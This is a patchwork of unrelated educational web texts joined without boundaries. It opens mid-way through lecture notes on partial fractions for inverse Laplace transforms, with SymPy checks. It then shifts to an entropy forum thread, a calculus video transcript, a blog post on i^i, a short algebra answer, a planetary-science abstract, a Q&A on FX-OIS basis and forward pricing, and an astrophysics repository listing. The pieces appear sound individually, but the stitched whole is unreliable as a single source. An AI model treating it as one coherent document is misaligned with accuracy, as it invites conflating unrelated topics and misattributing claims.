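assert (A, B) == (sp.Rational(-5, 7), sp.Rational(12, 7))

# SymPy's built-in partial fraction decomposition agrees
assert sp.simplify(sp.apart(H, s) - (A/(s + 2) + B/(s - 5))) == 0
```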
The last part of this example needed partial fractions to get the inverse transform. When we finally get back to differential equations and we start using Laplace transforms to solve them, you will quickly come to understand that partial fractions are a fact of life in these problems. Almost every problem will require partial fractions to one degree or another.
Note that we could have done the last part of this example as we had done the previous two parts. If we had we would have gotten hyperbolic functions. However, recalling the definition of the hyperbolic functions we could have written the result in the form we got from the way we worked our problem. However, most students have a better feel for exponentials than they do for hyperbolic functions and so it’s usually best to just use partial fractions and get the answer in terms of exponentials. It may be a little more work, but it will give a nicer (and easier to work with) form of the answer.
Be warned that in my class I’ve got a rule that if the denominator can be factored with integer coefficients then it must be.
So, let’s remind you how to get the correct partial fraction decomposition. The first step is to factor the denominator as much as possible. Then for each term in the denominator we will use the following table to get a term or terms for our partial fraction decomposition.
| Factor in denominator | Term in partial fraction decomposition |
| --- | --- |
| $$ax + b$$ | $$\displaystyle \frac{A}{{ax + b}}$$ |
| $${\left( {ax + b} \right)^k}$$ | $$\displaystyle \frac{{{A_1}}}{{ax + b}} + \frac{{{A_2}}}{{{{\left( {ax + b} \right)}^2}}} + \cdots + \frac{{{A_k}}}{{{{\left( {ax + b} \right)}^k}}}$$ |
| $$a{x^2} + bx + c$$ | $$\displaystyle \frac{{Ax + B}}{{a{x^2} + bx + c}}$$ |
| $${\left( {a{x^2} + bx + c} \right)^k}$$ | $$\displaystyle \frac{{{A_1}x + {B_1}}}{{a{x^2} + bx + c}} + \frac{{{A_2}x + {B_2}}}{{{{\left( {a{x^2} + bx + c} \right)}^2}}} + \cdots + \frac{{{A_k}x + {B_k}}}{{{{\left( {a{x^2} + bx + c} \right)}^k}}}$$ |
Notice that the first and third cases are really special cases of the second and fourth cases respectively.
So, let’s do a couple more examples to remind you how to do partial fractions.
Example 3 Find the inverse transform of each of the following.
1. $$\displaystyle G\left( s \right) = \frac{{86s - 78}}{{\left( {s + 3} \right)\left( {s - 4} \right)\left( {5s - 1} \right)}}$$
2. $$\displaystyle F\left( s \right) = \frac{{2 - 5s}}{{\left( {s - 6} \right)\left( {{s^2} + 11} \right)}}$$
3. $$\displaystyle G\left( s \right) = \frac{{25}}{{{s^3}\left( {{s^2} + 4s + 5} \right)}}$$
Show All Solutions Hide All Solutions
a $$\displaystyle G\left( s \right) = \frac{{86s - 78}}{{\left( {s + 3} \right)\left( {s - 4} \right)\left( {5s - 1} \right)}}$$
Here’s the partial fraction decomposition for this part.
$G\left( s \right) = \frac{A}{{s + 3}} + \frac{B}{{s - 4}} + \frac{C}{{5s - 1}}$
Now, this time we won’t go into quite the detail as we did in the last example. We are after the numerator of the partial fraction decomposition and this is usually easy enough to do in our heads. Therefore, we will go straight to setting numerators equal.
$86s - 78 = A\left( {s - 4} \right)\left( {5s - 1} \right) + B\left( {s + 3} \right)\left( {5s - 1} \right) + C\left( {s + 3} \right)\left( {s - 4} \right)$
As with the last example, we can easily get the constants by correctly picking values of $$s$$.
\begin{align*} & s = - 3 & - 336 & = A\left( { - 7} \right)\left( { - 16} \right) & \Rightarrow \hspace{0.25in}A & = - 3\\ & s = \frac{1}{5}& - \frac{{304}}{5} & = C\left( {\frac{{16}}{5}} \right)\left( { - \frac{{19}}{5}} \right) & \Rightarrow \hspace{0.25in}C & = 5\\ & s = 4 & 266 & = B\left( 7 \right)\left( {19} \right) & \Rightarrow \hspace{0.25in}B & = 2\end{align*}
So, the partial fraction decomposition for this transform is,
$G\left( s \right) = - \frac{3}{{s + 3}} + \frac{2}{{s - 4}} + \frac{5}{{5s - 1}}$
Now, in order to actually take the inverse transform we will need to factor a 5 out of the denominator of the last term. Here is the corrected transform as well as its inverse transform.
\begin{align*}G\left( s \right) & = - \frac{3}{{s + 3}} + \frac{2}{{s - 4}} + \frac{1}{{s - \frac{1}{5}}}\\ g\left( t \right) & = - 3{{\bf{e}}^{ - 3t}} + 2{{\bf{e}}^{4t}} + {{\bf{e}}^{\frac{t}{5}}}\end{align*}
b $$\displaystyle F\left( s \right) = \frac{{2 - 5s}}{{\left( {s - 6} \right)\left( {{s^2} + 11} \right)}}$$
So, for the first time we’ve got a quadratic in the denominator. Here’s the decomposition for this part.
$F\left( s \right) = \frac{A}{{s - 6}} + \frac{{Bs + C}}{{{s^2} + 11}}$
Setting numerators equal gives,
$2 - 5s = A\left( {{s^2} + 11} \right) + \left( {Bs + C} \right)\left( {s - 6} \right)$
Okay, in this case we could use $$s = 6$$ to quickly find $$A$$, but that’s all it would give. In this case we will need to go the “long” way around to getting the constants. Note that this way will always work but is sometimes more work than is required.
The “long” way is to completely multiply out the right side and collect like terms.
\begin{align*}2 - 5s & = A\left( {{s^2} + 11} \right) + \left( {Bs + C} \right)\left( {s - 6} \right)\\ & = A{s^2} + 11A + B{s^2} - 6Bs + Cs - 6C\\ & = \left( {A + B} \right){s^2} + \left( { - 6B + C} \right)s + 11A - 6C\end{align*}
In order for these two to be equal the coefficients of the $$s^{2}$$, $$s$$ and the constants must all be equal. So, setting coefficients equal gives the following system of equations that can be solved.
\left. {\begin{aligned} & {s^2}: & A + B & = 0\\ & {s^1}: & - 6B + C & = - 5\\ & {s^0}: & 11A - 6C & = 2\end{aligned}} \right\}\hspace{0.25in} \Rightarrow \hspace{0.25in}A = - \frac{{28}}{{47}},\,\,\,\,B = \frac{{28}}{{47}},\,\,\,\,\,C = - \frac{{67}}{{47}}
Notice that we used $$s^{0}$$ to denote the constants. This is habit on my part and isn’t really required, it’s just what I’m used to doing. Also, the coefficients are fairly messy fractions in this case. Get used to that. They will often be like this when we get back into solving differential equations.
There is a way to make our life a little easier as well with this. Since all of the fractions have a denominator of 47 we’ll factor that out as we plug them back into the decomposition. This will make dealing with them much easier. The partial fraction decomposition is then,
\begin{align*}F\left( s \right) & = \frac{1}{{47}}\left( { - \frac{{28}}{{s - 6}} + \frac{{28s - 67}}{{{s^2} + 11}}} \right)\\ & = \frac{1}{{47}}\left( { - \frac{{28}}{{s - 6}} + \frac{{28s}}{{{s^2} + 11}} - \frac{{67\frac{{\sqrt {11} }}{{\sqrt {11} }}}}{{{s^2} + 11}}} \right)\end{align*}
The inverse transform is then.
$f\left( t \right) = \frac{1}{{47}}\left( { - 28{{\bf{e}}^{6t}} + 28\cos \left( {\sqrt {11} t} \right) - \frac{{67}}{{\sqrt {11} }}\sin \left( {\sqrt {11} t} \right)} \right)$
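The system obtained by matching coefficients can be solved exactly with SymPy (a sketch; the comments label each equation by the power of $$s$$ it came from, as above):

```python
import sympy as sp

A, B, C = sp.symbols('A B C')
sol, = sp.linsolve([
    sp.Eq(A + B, 0),       # s^2 coefficients
    sp.Eq(-6*B + C, -5),   # s^1 coefficients
    sp.Eq(11*A - 6*C, 2),  # s^0 (constant) coefficients
], (A, B, C))
assert tuple(sol) == (sp.Rational(-28, 47), sp.Rational(28, 47), sp.Rational(-67, 47))
```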
c $$\displaystyle G\left( s \right) = \frac{{25}}{{{s^3}\left( {{s^2} + 4s + 5} \right)}}$$
With this last part do not get excited about the $$s^{3}$$. We can think of this term as
${s^3} = {\left( {s - 0} \right)^3}$
and it becomes a linear term to a power. So, the partial fraction decomposition is
$G\left( s \right) = \frac{A}{s} + \frac{B}{{{s^2}}} + \frac{C}{{{s^3}}} + \frac{{Ds + E}}{{{s^2} + 4s + 5}}$
Setting numerators equal and multiplying out gives.
\begin{align*}25 & = A{s^2}\left( {{s^2} + 4s + 5} \right) + Bs\left( {{s^2} + 4s + 5} \right) + C\left( {{s^2} + 4s + 5} \right) + \left( {Ds + E} \right){s^3}\\ & = \left( {A + D} \right){s^4} + \left( {4A + B + E} \right){s^3} + \left( {5A + 4B + C} \right){s^2} + \left( {5B + 4C} \right)s + 5C\end{align*}
Setting coefficients equal gives the following system.
\left. {\begin{aligned}& {s^4}: & A + D & = 0\\ & {s^3}: & 4A + B + E & = 0\\ & {s^2}: & 5A + 4B + C & = 0\\ & {s^1}: & 5B + 4C & = 0\\ & {s^0}: & 5C & = 25\end{aligned}} \right\}\hspace{0.25in} \Rightarrow \hspace{0.25in}A = \frac{{11}}{5},B = - 4,C = 5,D = - \frac{{11}}{5},E = - \frac{{24}}{5}
This system looks messy, but it’s easier to solve than it might look. First, we get $$C$$ for free from the last equation. We can then use the fourth equation to find $$B$$. The third equation will then give $$A$$, etc.
When plugging into the decomposition we’ll get everything with a denominator of 5, then factor that out as we did in the previous part in order to make things easier to deal with.
$G\left( s \right) = \frac{1}{5}\left( {\frac{{11}}{s} - \frac{{20}}{{{s^2}}} + \frac{{25}}{{{s^3}}} - \frac{{11s + 24}}{{{s^2} + 4s + 5}}} \right)$
Note that we also factored a minus sign out of the last two terms. To complete this part we’ll need to complete the square on the latter term and fix up a couple of numerators. Here’s that work.
\begin{align*}G\left( s \right) & = \frac{1}{5}\left( {\frac{{11}}{s} - \frac{{20}}{{{s^2}}} + \frac{{25}}{{{s^3}}} - \frac{{11s + 24}}{{{s^2} + 4s + 5}}} \right)\\ & = \frac{1}{5}\left( {\frac{{11}}{s} - \frac{{20}}{{{s^2}}} + \frac{{25}}{{{s^3}}} - \frac{{11\left( {s + 2 - 2} \right) + 24}}{{{{\left( {s + 2} \right)}^2} + 1}}} \right)\\ & = \frac{1}{5}\left( {\frac{{11}}{s} - \frac{{20}}{{{s^2}}} + \frac{{25\frac{{2!}}{{2!}}}}{{{s^3}}} - \frac{{11\left( {s + 2} \right)}}{{{{\left( {s + 2} \right)}^2} + 1}} - \frac{2}{{{{\left( {s + 2} \right)}^2} + 1}}} \right)\end{align*}
The inverse transform is then.
$g\left( t \right) = \frac{1}{5}\left( {11 - 20t + \frac{{25}}{2}{t^2} - 11{{\bf{e}}^{ - 2t}}\cos \left( t \right) - 2{{\bf{e}}^{ - 2t}}\sin \left( t \right)} \right)$
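The back-substitution just described — $$C$$ for free from the last equation, then $$B$$, then $$A$$, and so on — can be checked with exact rational arithmetic (a quick sketch, not part of the original notes):

```python
from fractions import Fraction as Fr

# Work up from the bottom of the coefficient system for part (c)
C = Fr(25, 5)        # s^0:  5C = 25
B = -4 * C / 5       # s^1:  5B + 4C = 0
A = -(4*B + C) / 5   # s^2:  5A + 4B + C = 0
D = -A               # s^4:  A + D = 0
E = -(4*A + B)       # s^3:  4A + B + E = 0

assert (A, B, C, D, E) == (Fr(11, 5), Fr(-4), Fr(5), Fr(-11, 5), Fr(-24, 5))
```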
So, one final time. Partial fractions are a fact of life when using Laplace transforms to solve differential equations. Make sure that you can deal with them.
# Irreversible process: entropy change of a cylinder
1. Apr 10, 2013
### Abigale
Hi,
I have read that for an irreversible process the equation for the entropy is: $$ds>\frac{dQ}{T}$$
But if I regard a cylinder connected to a heat reservoir and want to calculate the entropy change of this cylinder, why can I use the equation $$ds=\frac{dQ}{T}$$?
THX
2. Apr 10, 2013
### Staff: Mentor
Your inequality applies to the closed system that you are applying the process to. Your second equation is not the entropy change for the material in the cylinder unless the process is reversible, irrespective of the heat reservoir. If you regard the heat reservoir as a system, then the second equation describes its change of entropy, since its temperature is constant and (virtually) uniform, and the heat addition takes place reversibly. The key to inequality vs. equality is whether the system under consideration is undergoing a reversible change.
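As a concrete numeric illustration (hypothetical numbers, not from the thread): let heat flow irreversibly from a hot reservoir into a colder one. Each reservoir, taken alone, exchanges heat reversibly at constant temperature, so the equality applies to each; the combined process is irreversible, and the total entropy change is strictly positive.

```python
# Hypothetical numbers: Q joules of heat flow irreversibly from a hot
# reservoir into a colder one; each reservoir alone absorbs/rejects the
# heat reversibly at constant T, so dS = dQ/T applies to each separately.
Q = 100.0       # J
T_hot = 400.0   # K
T_cold = 300.0  # K

dS_hot = -Q / T_hot           # equality: reservoir at constant T
dS_cold = Q / T_cold          # equality: reservoir at constant T
dS_total = dS_hot + dS_cold   # the overall process is irreversible

assert dS_total > 0  # strict inequality: entropy was generated
```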
# Evaluate the integral. $\displaystyle \int \frac{e^{2x}}{1 + e^x}\ dx$
## $$e^{x}-\ln \left(1+e^{x}\right)+C$$
#### Topics
Integration Techniques
### Video Transcript
Let’s try a substitution for this one. Take $u = e^x$, so that $du = e^x\,dx$. Rewriting the integrand, $e^{2x}\,dx = e^x \cdot e^x\,dx = u\,du$, and the denominator is $1 + u$, so the integral becomes $\int \frac{u}{1+u}\,du$. The next step is polynomial division: the quotient is $1$ and the remainder is $-1$, so $\frac{u}{1+u} = 1 - \frac{1}{1+u}$. Integrating gives $u - \ln|1+u| + C$, and substituting back $u = e^x$ yields $e^x - \ln(1+e^x) + C$. We can drop the absolute value here since $e^x + 1$ is positive, and that’s the final answer.
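The final answer is easy to verify by differentiation (a quick SymPy sketch):

```python
import sympy as sp

x = sp.symbols('x')
claimed = sp.exp(x) - sp.log(1 + sp.exp(x))

# Differentiating the claimed antiderivative should recover the integrand
assert sp.simplify(sp.diff(claimed, x) - sp.exp(2*x)/(1 + sp.exp(x))) == 0
```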
# The Most Imaginary Number… is Real!
On the eve of “π Day,” a hush has fallen on the mathematical internet. Everyone is gearing up, getting ready to celebrate the beauty of the transcendental number π. Indeed, π is an amazing number. I have a book coming out in October about the geometric problems of antiquity (Tales of Impossibility: The 2000-Year Quest to Solve the Mathematical Problems of Antiquity, Princeton University Press), and one of the problems—squaring the circle—is all about the nature of π.
However, because it is not yet π Day, I thought I’d introduce you to another number that appears in the book—one that is not as well known but that has a very surprising property. The number is $i^i$; that is, $\sqrt{-1}^{\sqrt{-1}}.$ At a glance, this looks like the most imaginary number possible—an imaginary number raised to an imaginary power. But in fact, as Leonhard Euler pointed out to Christian Goldbach in a 1746 letter, $i^i$ is a real number!
Euler proved that for any angle $\theta,$ expressed in radians,
$e^{i\theta}=\cos(\theta)+i \sin(\theta).$
If we take $\theta=\pi/2$ radians (that is, $\theta=90^{\circ}$), then Euler’s formula yields
$e^{i\pi/2}=\cos(\pi/2)+i \sin(\pi/2)=0+i\cdot 1=i.$
Therefore,
$i^{i}=(e^{i\pi/2})^{i}=e^{i\cdot i\pi/2}=e^{-\pi/2}=0.2078795763\ldots,$
which is clearly real! Moreover, like π, $i^i$ is a transcendental number (and hence an irrational number). This fact was proved in 1929 by the 23-year-old Russian Aleksander Gelfond.
(Actually, as Euler pointed out, $i^i$ does not have a single value; rather, it takes on infinitely many real values. The angle $i$ makes with the real axis can be expressed as $2\pi k+\pi/2$ for any integer k. Thus, using the reasoning above, $i^{i}=e^{-2\pi k-\pi/2}$.)
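If you want to see this on a computer, Python's complex arithmetic agrees (a quick sketch; the loop over $k$ uses the angles $2\pi k + \pi/2$ from above, exponentiating the exponent directly so the computation stays on branch $k$ rather than collapsing to the principal value):

```python
import cmath
import math

# Principal value: i**i = e^{-pi/2}, a real number
z = 1j ** 1j
assert abs(z.imag) < 1e-12
assert math.isclose(z.real, math.exp(-math.pi / 2), rel_tol=1e-12)

# Other branches: i = e^{i(2*pi*k + pi/2)}, so i**i = e^{-(2*pi*k + pi/2)}
for k in (-1, 0, 1, 2):
    theta = 2 * math.pi * k + math.pi / 2
    branch = cmath.exp(1j * theta * 1j)  # e^{(i*theta)*i} computed directly
    assert math.isclose(branch.real, math.exp(-theta), rel_tol=1e-9)
```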
Happy π Day Eve! ($\pi-1$ Day? $\pi-0.01$ Day?)
# How do you simplify sqrt3/ sqrt5?
$\frac{\sqrt{15}}{5}$
You just have to multiply both the numerator $\left(\sqrt{3}\right)$ and the denominator $\left(\sqrt{5}\right)$ by $\sqrt{5}$ to rationalize the denominator:
$\frac{\sqrt{3}}{\sqrt{5}}$ = $\frac{\sqrt{3}}{\sqrt{5}}$ * $\frac{\sqrt{5}}{\sqrt{5}}$
= $\frac{\sqrt{15}}{\sqrt{25}}$ = $\frac{\sqrt{15}}{5}$
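A quick numeric check of the equality (a sketch):

```python
import math

lhs = math.sqrt(3) / math.sqrt(5)
rhs = math.sqrt(15) / 5
assert math.isclose(lhs, rhs, rel_tol=1e-12)
```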
31st Annual Meeting of the DPS, October 1999
Session 2. Extra-solar Planets: Dwarfs and Disks
Contributed Oral Parallel Session, Monday, October 11, 1999, 9:00-10:00am, Sala Kursaal
## [2.05] Dust Rings in Gas Disks. A model for HR 4796A
H.H. Klahr, D.N.C. Lin, P. Bodenheimer (UCO/Lick Observatory)
Circumstellar dust rings like the one observed around HR 4796A are not a foolproof indicator for the formation of massive planets. This paper presents a kinematical model for such a dusty circumstellar ring. A relatively small perturbation (10%) in the surface density distribution of a gas disk produces via secondary effects a dust ring with sharp edges. A distribution of surface density that locally increases outward can be the effect of a small planet (at R < 70 AU), but could also result from photo-evaporation, from an inhomogeneous initial distribution of mass after infall, or from inhomogeneities in the radial viscous transport of material. Given an assumed gas surface density distribution, the dust distribution is calculated including the effects of sub- and hyper-Keplerian disk rotation due to the radial pressure gradients, the Poynting-Robertson effect, direct radiation pressure and turbulent stirring. We find that dust particles have to be larger than 100 μm in radius in order to be gravitationally bound to the system. The observed dust distribution can be explained with a gas density perturbation at 70 AU with an amplitude of 10%.
# STIR topics: Implied FX-OIS Basis and FX Forward/Swap Pricing
if someone could provide some clarity on the below:
1. What is meant by 'Implied FX-OIS Basis'? For example: "ON JPY trading at parity, 1W implied OIS basis moved 70BP" and "3M Implied OIS basis moved 25 BP to imply -130 BP (3M LIBOR XCCY is +4)". My attempt: we have interest rates implied by FX swap points, compared against what the points would be had we used the term OIS rates for the underlying currencies - the difference being some basis swap (which would imply an IBOR v OCR swap, if I am correct) against which we can measure dislocation in FX swap points, stripping out the market's forward-looking expectations of OCR rates?
2a. A client wants 5y EURUSD FX Forward Points (mid) - what instrument(s) do we observe to derive the points from spot? I am explicitly asking this way because once we establish the relevant instruments to observe, I will then gain an understanding of what drives FX points beyond the simple 'interest differentials'/CIP story that most examples use, which are sub-1y and just observe actual IBOR data to create a rate curve. My attempt below:
With reference to this topic: Calculating Cross Currency basis swaps, I have access to my own Bloomberg/access to FXFA - it would appear we observe direct or inferred IBOR rates in each currency (short-end: published IBOR rates, such as actual 3m LIBOR, or 3m LIBOR derived from listed futures or FRA, long-end: IRS). BBG then shows us the difference between FX Swap Implied from those curves and Actual FX Swaps points - the difference being attributable to the XCCY Basis Swap. So in effect we need 2 of the following 3 to solve for the third: IBOR curves (whether actual or observed from the market), XCCY Basis Curve and Actual FX Swap Points. Correct?
2b. Let's assume we have two currencies with completely identical interest rate term structures, but the basis is very positive - say IBOR+100bp for the non-USD currency. The points should then be negative by virtue of the interest rate premium implied by the XCCY basis swap on the LHS currency (non-USD/USD)? I am trying to gauge how changes in XCCY basis impact FX swap points, although they would appear to be mostly driven by IBOR differentials with some spot component, having graphed FX points against the difference between term swap yields in various currencies. By spot component, I would also ask: in an imaginary world where interest rates are exactly the same between two currencies (both current and implied forward), but the spot rate is 10% different between T and T+1 (nothing else changes) - would the swap points also change?
2c. Let's assume balance sheet constraints and credit concerns are non-existent and 5y EURUSD points are wildly off market from what we have calculated from point 2a above - how do we arbitrage this in practice? I am asking this, as I believe I have structured this line of questioning so that the answer should be via the instruments observed in 2a. There has to be some upper/lower bound to FX points once arbitrage becomes attractive enough.
Thank you!
Addition: I want to articulate the mechanics of what we are doing - we are borrowing/lending an amount of fixed currency X, against which we are then lending/borrowing a variable amount of currency Y - so we need to know what the effective term deposit/lending rate in each currency is. Given one leg of an FX swap is normally fixed, the difference for the market maker is cleared in the spot market such that the future amount is the fixed notional also, but this adds/subtracts from the notional of the variable amount, which is why the points have some sensitivity to the absolute level of the spot rate.
## 2 Answers
Implied FX-OIS basis should be pretty simple to "compute": it is the classical "Cross-currency" basis observed in FX Swaps & FX Forwards, which can be backed out when plugging in OIS rates (instead of Libor rates).
## No Arbitrage between FX Spot & FX Forwards:
Taking EUR/USD as an example, we must have for no arbitrage:
$$(1+r_{EUR}) F_{EUR/USD}=S_{EUR/USD}(1+r_{USD}+r_{basis})$$
In words: on the LHS, you take 1 EUR and deposit it into a EUR interest account, then convert it to USD at the end of the interest-bearing period using a Forward.
This has to equal in value to the RHS: here, you convert 1 EUR into USD at spot and deposit it into a USD interest account for the same period of time as the Forward maturity on the LHS.
For clarity: $$S_{EUR/USD}$$ is the spot, $$F_{EUR/USD}$$ is the forward.
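As a sketch of how this relation prices a forward, the equation can be rearranged for $F$. The function name, the spot level, and all rates below are illustrative assumptions, not market data:

```python
# Minimal sketch of the no-arbitrage relation above:
#   (1 + r_EUR) * F = S * (1 + r_USD + r_basis)
# solved for the forward F. All inputs are made-up examples.

def forward_rate(spot: float, r_eur: float, r_usd: float, r_basis: float) -> float:
    """EUR/USD forward implied by spot, the two deposit rates, and the basis."""
    return spot * (1 + r_usd + r_basis) / (1 + r_eur)

S = 1.10  # hypothetical EUR/USD spot
F = forward_rate(S, r_eur=0.03, r_usd=0.05, r_basis=0.0017)
print(f"1y forward: {F:.6f}, forward points: {(F - S) * 1e4:.1f} pips")
```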
## Using forwards for funding in foreign currency:
What is the $$r_{basis}$$ term? We can understand that term better if we invert the equation above as follows, to get:
$$(1+r_{USD}+r_{basis})=(1+r_{EUR})\left(\frac{F_{EUR/USD}}{S_{EUR/USD}}\right)$$
Imagine someone has access to EUR currency and wants to use it to obtain USD "funding" for a specific period of time (say 1 year): they know the interest rate $$r_{EUR}$$ at which they can raise the EUR (which is their domestic currency). They also know the FX Spot between EUR and USD (i.e. $$S_{EUR/USD})$$ and the 1-year FX Forward rate between EUR and USD (i.e. $$F_{EUR/USD})$$.
In other words, they can obtain EUR, exchange the EUR for USD at spot and using the 1-y Forward, they can lock into an implied "USD interest rate": the interest rate they will effectively have to "pay" to get access to USD funding for the duration of 1-year.
Someone who has access to USD and wants to obtain funding in EUR for a fixed period of time can do the same in reverse:
$$(1+r_{EUR})=(1+r_{USD}+r_{basis})\left(\frac{S_{EUR/USD}}{F_{EUR/USD}}\right)$$
They can lock into an EUR interest rate, when funding the EUR using their domestic USD currency.
Usually, institutions fund themselves at OIS rates: so the USD institution that has access to USD as their domestic currency could raise this at USD-OIS, whilst the European institution that has access to EUR currency could raise this at EUR-OIS.
If the demand for USD via EUR funding is in perfect equilibrium with the demand for EUR via USD funding, the term $$r_{basis}$$ would be zero. But this is hardly the case: the EUR/USD basis changes all the time in line with the prevailing demand for the funding in one currency against the other.
The EUR/USD basis is typically a few BPS (last time I looked it was 17bps added onto the EUR leg, which showed increased demand for EUR funding vs. USD funding).
Btw: the basis term $$r_{basis}$$ described above is directly tradable for maturities longer than 1y via Cross-Currency Swaps. For maturities shorter than 1y (for which Cross-Currency swaps don't trade), it is indirectly reflected in the FX Forwards via the equations above.
## Summary:
$$r_{basis}$$ reflects the prevailing demand for funding in one currency via another currency, for a fixed period of time (term). Each term (i.e. 6m, 1y, 5y, etc) would have its own $$r_{basis}$$. When OIS rates are used in the equations above, you can back out the Xccy-OIS basis. If Libor rates are used instead, you can back out the Libor-Xccy basis.
So in conclusion, taking 6-month tenor as an example: you know the 6m EUR-OIS rate, the 6m USD-OIS rate, the EUR/USD Spot and the 6m EUR/USD Forward: when you plug all of these into the equations above, you can back out the 6m FX-OIS basis for EUR/USD (and you can do this for any other tenor or currency).
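A minimal sketch of that back-out step, inverting the no-arbitrage relation from the first section; the function and all inputs are hypothetical illustrations, not market quotes:

```python
# Back out the implied FX-OIS basis by inverting
#   (1 + r_EUR) * F = S * (1 + r_USD + r_basis).
# Spot, forward, and OIS rates below are made up for illustration.

def implied_basis(spot: float, forward: float,
                  r_eur_ois: float, r_usd_ois: float) -> float:
    """Solve the no-arbitrage relation for r_basis on the USD leg of EUR/USD."""
    return (1 + r_eur_ois) * forward / spot - (1 + r_usd_ois)

b = implied_basis(spot=1.10, forward=1.1232, r_eur_ois=0.03, r_usd_ois=0.05)
print(f"implied 1y FX-OIS basis: {b * 1e4:.1f} bp")
```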
FX-OIS basis, depending on the fx pair, basically means, the implied yield vs the OIS basis of the currency pair.
ON JPY trading at parity: USDJPY offered or bid at "0"
1W implied OIS basis moved 70BP: depending on whether it moved down or up, it is trading ±70bp versus the OIS basis. If upward, demand for JPY has inched up (equivalently, demand for USD has fallen), which translates to JPY borrowing cost now being higher than at the last reference point. The pricing is therefore USDJPY 1W at (previous offered level + 70bp); the opposite occurs if borrowing costs rise for USD.
• "FX-OIS basis, depending on the fx pair, basically means, the implied yield vs the OIS basis of the currency pair." Do you mean for example (3m AUDUSD rate implied from FX swaps) less (3m AUD OIS)? What does the difference/basis represent? Feb 28 at 13:44 |
# Other Astrophysics and Astronomy Commons™
## All Articles in Other Astrophysics and Astronomy
309 full-text articles.
2020 San Jose State University
#### Computational Astronomy: Classification Of Celestial Spectra Using Machine Learning Techniques, Gayatri Milind Hungund
##### Master's Projects
Lightyears beyond the Planet Earth there exist plenty of unknown and unexplored stars and galaxies that need to be studied in order to support the Big Bang Theory and also make important astronomical discoveries in quest of knowing the unknown. Sophisticated devices and high-power computational resources are now deployed to make a positive effort towards data gathering and analysis. These devices produce massive amounts of data from the astronomical surveys, usually in terabytes or petabytes. It is laborious to process this data and determine the findings in a short period of time. Many details can be missed ...
Automated Spectroscopic Detection And Mapping Using Alma And Machine Learning Techniques, 2020 Southern Methodist University
#### Automated Spectroscopic Detection And Mapping Using Alma And Machine Learning Techniques, Steven Cocke, Andrew Wilkins, Josephine Mcdaniel, John Santerre, Conor Nixon
##### SMU Data Science Review
In this paper we present a methodology for automating the classification of spectrally resolved observations of multiple emission lines with the Atacama Large Millimeter/submillimeter Array (ALMA). Molecules in planetary atmospheres emit or absorb different wavelengths of light thereby providing a unique signature for each species. ALMA data were taken from interferometric observations of Titan made between UT 2012 July 03 23:22:14 and 2012 July 04 01:06:18 as part of ALMA project 2011.0.00319.S. We first employed a greedy set cover algorithm to identify the most probable molecules that would reproduce the set of frequencies with respective flux greater than ...
Fully Interactive And Refined Resolution Simulations Of The Martian Dust Cycle By The Marswrf Model, 2020 United Arab Emirates University
#### Fully Interactive And Refined Resolution Simulations Of The Martian Dust Cycle By The Marswrf Model, Claus Gebhardt, Abdelgadir Abuelgasim, Ricardo M. Fonseca, Javier Martín-Torres, Maria-Paz Zorzano
##### National Space Science & Technology Center Datasets
The Mars climate model MarsWRF was run with fully interactive dust parametrization, assuming an infinite surface dust reservoir. Changing the horizontal resolution from 5°×5° to 2°×2° produced different dust cycle variability and dust source regions. The higher spatial resolution allowed for a better representation of the surface topography and associated surface dust lifting by wind stress, which is more consistent with observations. Global Dust Storm Events typically occurred if dust storm activity at northern Hellas Planitia connected with that at southern Chryse Planitia.
2020 Michigan Technological University
#### Cosmic-Ray Acceleration In The Cygnus Ob2 Stellar Association, Binita Hona
##### Dissertations, Master's Theses and Master's Reports
The Cygnus region of our Galaxy consists of an active star forming region and a wealth of various astrophysical sources such as pulsar wind nebulae (PWN), supernova remnants (SNRs), and massive star clusters. Massive stellar clusters and associations have been postulated as possible sources of cosmic rays (CRs) in our Galaxy. One example of a gamma-ray source associated with a stellar association lies in the Cygnus region known as the "Cygnus Cocoon". It is an extended region of gamma-ray emission in the Cygnus X region and attributed to a possible superbubble with freshly accelerated CRs which are hypothesized to produce ...
New Foundation In The Sciences: Physics Without Sweeping Infinities Under The Rug, 2019 University of New Mexico
#### New Foundation In The Sciences: Physics Without Sweeping Infinities Under The Rug, Florentin Smarandache, Victor Christianto, Robert Neil Boyd
##### Mathematics and Statistics Faculty and Staff Publications
It is widely known among the Frontiers of physics, that “sweeping under the rug” practice has been quite the norm rather than exception. In other words, the leading paradigms have strong tendency to be hailed as the only game in town. For example, renormalization group theory was hailed as cure in order to solve infinity problem in QED theory. For instance, a quote from Richard Feynman goes as follows: “What the three Nobel Prize winners did, in the words of Feynman, was "to get rid of the infinities in the calculations. The infinities are still there, but now they can ...
2019 Georgia College and State University
#### #7 - Cluster Characterization And Veto Analysis Of The Frequencyhough All-Sky Continuous Gravitational Wave Search, Cain Gantt, Pia Astone
##### Georgia Undergraduate Research Conference (GURC)
Continuous gravitational waves (CWs) can be produced by rotating neutron stars with an asymmetric mass distribution about their axis of rotation. The FrequencyHough search is an all-sky search for these signals, and the large parameter space considered introduces computational limits into the pipeline. We investigate the distributions of candidates produced by earlier stages in the pipeline, and propose the mechanisms within the pipeline that produce these effects. We also characterize the performance of two steps, a veto and ranking procedure, used to reduce the number of candidates within the FrequencyHough pipeline. We found the distance metric in the parameter space ...
Galaxy And Mass Assembly: A Comparison Between Galaxy-Galaxy Lens Searches In Kids/Gama, 2019 University of Louisville
#### Galaxy And Mass Assembly: A Comparison Between Galaxy-Galaxy Lens Searches In Kids/Gama, Shawn Knabel, Benne Holwerda
##### Posters-at-the-Capitol
Strong gravitational lenses are cases where a distant background galaxy is located directly behind a massive foreground galaxy, whose gravity causes the light from the background galaxy to bend around the foreground galaxy. In addition to being visually stunning, these rare events are useful laboratories for furthering our understanding of gravity and cosmology and to determine properties, such as the mass and dark matter content, of the lensing galaxies themselves. The trouble is finding enough of these strong gravitational lenses for further study. The immensity of the catalogs being collected by state-of-the-art telescopes requires equally innovative methods for interpreting that ...
Large‐Amplitude Mountain Waves In The Mesosphere Observed On 21 June 2014 During Deepwave: 1.Wave Development, Scales, Momentum Fluxes, And Environmental Sensitivity, 2019 Utah State University
#### Large‐Amplitude Mountain Waves In The Mesosphere Observed On 21 June 2014 During Deepwave: 1.Wave Development, Scales, Momentum Fluxes, And Environmental Sensitivity, Michael J. Taylor, Pierre-Dominique Pautet, David C. Fritts, Bernd Kaifler, Steven M. Smith, Yucheng Zhao, Neal R. Criddle, Pattilyn Mclaughlin, William R. Pendleton Jr., Michael P. Mccarthy, Gonzalo Hernandez, Stephen D. Eckermann, James Doyle, Markus Rapp, Ben Liley, James M. Russell Iii
##### Publications
